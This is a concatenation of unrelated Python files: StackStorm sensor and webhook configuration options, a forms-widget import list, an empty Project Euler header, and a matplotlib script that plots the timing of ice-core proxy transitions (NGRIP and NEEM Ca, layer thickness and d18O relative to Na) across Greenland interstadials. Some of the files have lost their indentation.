def _register_common_opts(ignore_errors=False):
st2cfg.register_opts(ignore_errors=ignore_errors)
def _register_sensor_container_opts(ignore_errors=False):
logging_opts = [
cfg.StrOpt('logging', default='conf/logging.sensorcontainer.conf',
help='location of the logging.conf file')
]
st2cfg.do_register_opts(logging_opts, group='sensorcontainer', ignore_errors=ignore_errors)
sensor_test_opt = cfg.StrOpt('sensor-name', help='Only run sensor with the provided name.')
st2cfg.do_register_cli_opts(sensor_test_opt, ignore_errors=ignore_errors)
st2_webhook_opts = [
cfg.StrOpt('host', default='0.0.0.0', help='Host for the st2 webhook endpoint.'),
cfg.IntOpt('port', default='6000', help='Port for the st2 webhook endpoint.'),
cfg.StrOpt('url', default='/webhooks/st2/', help='URL of the st2 webhook endpoint.')
]
st2cfg.do_register_opts(st2_webhook_opts, group='st2_webhook_sensor',
ignore_errors=ignore_errors)
generic_webhook_opts = [
cfg.StrOpt('host', default='0.0.0.0', help='Host for the generic webhook endpoint.'),
cfg.IntOpt('port', default='6001', help='Port for the generic webhook endpoint.'),
cfg.StrOpt('url', default='/webhooks/generic/', help='URL of the st2 webhook endpoint.')
]
st2cfg.do_register_opts(generic_webhook_opts, group='generic_webhook_sensor',
ignore_errors=ignore_errors)
def register_opts(ignore_errors=False):
_register_common_opts(ignore_errors=ignore_errors)
_register_sensor_container_opts(ignore_errors=ignore_errors)
register_opts(ignore_errors=True)
def parse_args(args=None):
CONF(args=args, version=VERSION_STRING)
# ===== next file =====
from mighty.forms.widgets.date import DateInput
from mighty.forms.widgets.time import TimeInput
from mighty.forms.widgets.ckeditor import Document, Classic
from mighty.forms.widgets.signature import SignatureInput
__all__ = (
    'DateInput', 'TimeInput', 'Document', 'Classic', 'SignatureInput',
)

# ===== next file: problem0426.py =====
###########################
#
# #426 Box-ball system - Project Euler
# https://projecteuler.net/problem=426
#
# Code by <NAME>
#
###########################
# ===== next file =====
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import joblib as jl
from matplotlib.patches import ConnectionPatch
plt.style.use('figstyle.mplstyle')
def style_plot(fig, axes):
fig.subplots_adjust(hspace=0.1)
for i, ax in enumerate(axes):
ax.patch.set_alpha(0.0)
side = ['left', 'right'][i % 2]
for _, spine in ax.spines.items():
spine.set_visible(False)
ax.spines[side].set_visible(True)
ax.yaxis.set_label_position(side)
ax.yaxis.set_ticks_position(side)
ax.xaxis.set_ticks_position('none')
axes[0].spines['top'].set_visible(True)
axes[0].xaxis.set_label_position('top')
axes[-1].spines['bottom'].set_visible(True)
axes[-1].xaxis.set_ticks_position('bottom')
axes[0].xaxis.set_ticks_position('top')
return fig, axes
def vmarker(x0, x1, ax0, ax1, **kwargs):
xy0 = (x0, ax0.get_ylim()[0])
xy1 = (x1, ax1.get_ylim()[1])
ax0.axvline(x0, **kwargs)
ax1.axvline(x1, **kwargs)
con = ConnectionPatch(xy0, xy1, 'data', 'data', ax0, ax1, **kwargs)
ax0.add_artist(con)
def calc_med_iqr(y, q=[5, 95], axis=None):
qs = np.percentile(y, [q[0], 50, q[-1]], axis=axis)
yerr = np.diff(qs, axis=0)
y = qs[1]
return y, yerr
def calc_point_lags(t0_1, dt_1, t0_2=0, dt_2=0):
    dt0 = t0_1 - t0_2
    dtm = t0_1 + 0.5 * dt_1 - (t0_2 + 0.5 * dt_2)
    dt1 = t0_1 + dt_1 - (t0_2 + dt_2)
    return dt0, dtm, dt1


iso_data = pd.read_csv('data/NGRIP_10yr.csv', usecols=(0, 4), comment='#')
iso_data = iso_data.loc[(iso_data['Age_BP'] > 10000) &
                        (iso_data['Age_BP'] <= 60000), :]

gi_table = pd.read_table('data/GIS_table.txt', comment='#')
gi_table = gi_table[['GI' in s or 'Holocene' in s for s in gi_table['Event']]]
gi_table = gi_table[gi_table['Age'] < 60000]
gi_table = gi_table[np.any(gi_table[['NGRIP_Ca', 'NGRIP_Na', 'NGRIP_lt',
                                     'NEEM_Ca', 'NEEM_Na']] == 1.0, axis=1)]
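

# Four stacked panels: the NGRIP d18O record on top, then the onset, midpoint and
# endpoint lags of each proxy relative to the Na ramp fits, one panel per lag type.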
fig, axes = plt.subplots(nrows=4, sharex=False, figsize=(1.414 * 7, 7))
# Isotope data
axes[0].plot(iso_data['Age_BP'] / 1000, iso_data['d18O'], color='k', lw=0.25)
ref_par = 'Na'
x_plt = pd.Series(np.arange(len(gi_table)), gi_table['Event'])
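# Stagger the series horizontally around each event's x position so their error
# bars do not overlap; dx is advanced by 0.15 after each series is drawn.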
dx = -0.225
# Calcium
for fmt, CORE in zip(('^', 'o'), ['NEEM', 'NGRIP']):
    traces = jl.load('ramp_fits/traces/%s.gz' % CORE) \
        .sel(param=['Ca', ref_par]).dropna(dim='event')
    x = x_plt[np.array(traces.coords['event'])]
    dt0, dtm, dt1 = calc_point_lags(traces.sel(param='Ca', model='t0'),
                                    traces.sel(param='Ca', model='dt'),
                                    traces.sel(param=ref_par, model='t0'),
                                    traces.sel(param=ref_par, model='dt'))
    for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
        y, yerr = calc_med_iqr(tr, axis=0)
        ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
                    elinewidth=0.75, color='#984ea3',
                    label='Ca$^{2+}$ (%s)' % CORE)
    dx += 0.15
# layer thickness
traces = jl.load('ramp_fits/traces/NGRIP.gz') \
    .sel(param=['lt', ref_par]).dropna(dim='event')
x = x_plt[np.array(traces.coords['event'])]
dt0, dtm, dt1 = calc_point_lags(traces.sel(param='lt', model='t0'),
                                traces.sel(param='lt', model='dt'),
                                traces.sel(param=ref_par, model='t0'),
                                traces.sel(param=ref_par, model='dt'))
for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
    y, yerr = calc_med_iqr(tr, axis=0)
    ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
                elinewidth=0.75, color='#4daf4a',
                label=r'$\lambda$ (NGRIP)')
dx += 0.15

# water isotopes (d18O)
traces = jl.load('ramp_fits/traces/NGRIP.gz') \
    .sel(param=['d18O', ref_par]).dropna(dim='event')
x = x_plt[np.array(traces.coords['event'])]
dt0, dtm, dt1 = calc_point_lags(traces.sel(param='d18O', model='t0'),
                                traces.sel(param='d18O', model='dt'),
                                traces.sel(param=ref_par, model='t0'),
                                traces.sel(param=ref_par, model='dt'))
for ax, tr in zip(axes[1:], (dt0, dtm, dt1)):
    y, yerr = calc_med_iqr(tr, axis=0)
    ax.errorbar(x + dx, y, yerr, fmt=fmt, ms=2.0, capsize=0,
                elinewidth=0.75, color='0.5', label=r'$\delta^{18}$O (NGRIP)')
dx += 0.15
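

# Link each event's GICC05 age on the top panel to its categorical position in the
# lag panels, carrying the marker straight down through all four axes.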
for i, a in enumerate(gi_table['Age'] / 1000):
    vmarker(a, i, axes[0], axes[1], lw=0.2, ls='solid', zorder=-100)
    vmarker(i, i, axes[1], axes[2], lw=0.2, ls='solid', zorder=-100)
    vmarker(i, i, axes[2], axes[3], lw=0.2, ls='solid', zorder=-100)

for ax in axes[1:]:
    ax.set_xlim(-1.0, len(x_plt))
    ax.axhline(0.0, zorder=-100, lw=0.25, ls='solid')
axes[0].set_ylabel(r'$\delta^{18}\mathrm{O}$ (‰)')
axes[1].set_ylabel('Onset lag (yr)')
axes[2].set_ylabel('Midpoint lag (yr)')
axes[3].set_ylabel('Endpoint lag (yr)')
axes[0].set_xlabel('GICC05 Age (kyr before 1950)')
axes[0].xaxis.set_major_locator(plt.MultipleLocator(10))
axes[0].xaxis.set_minor_locator(plt.MultipleLocator(2))
axes[-1].set_xlabel('Onset of…')
fig, axes = style_plot(fig, axes)
axes[1].xaxis.set_ticks(())
axes[2].xaxis.set_ticks(())
axes[-1].xaxis.set_ticks(np.arange(len(gi_table)))
axes[-1].xaxis.set_ticklabels(gi_table['Event'],
                              rotation=30, va='top', ha='right')

legend_ax = axes[-1]
legend_ax.legend(loc='lower right', fontsize=5, ncol=4,
                 frameon=True, framealpha=1.0,
                 edgecolor='white', facecolor='white',
                 columnspacing=0.2, borderpad=0.2)

for l, ax in zip(('a', 'b', 'c', 'd'), axes):
    ax.text(0.01, 0.95, '(%s)' % l, ha='left', va='top', transform=ax.transAxes,
            weight='bold', fontsize=7)
fig.savefig('figures/fig_03_timing_diffs.pdf')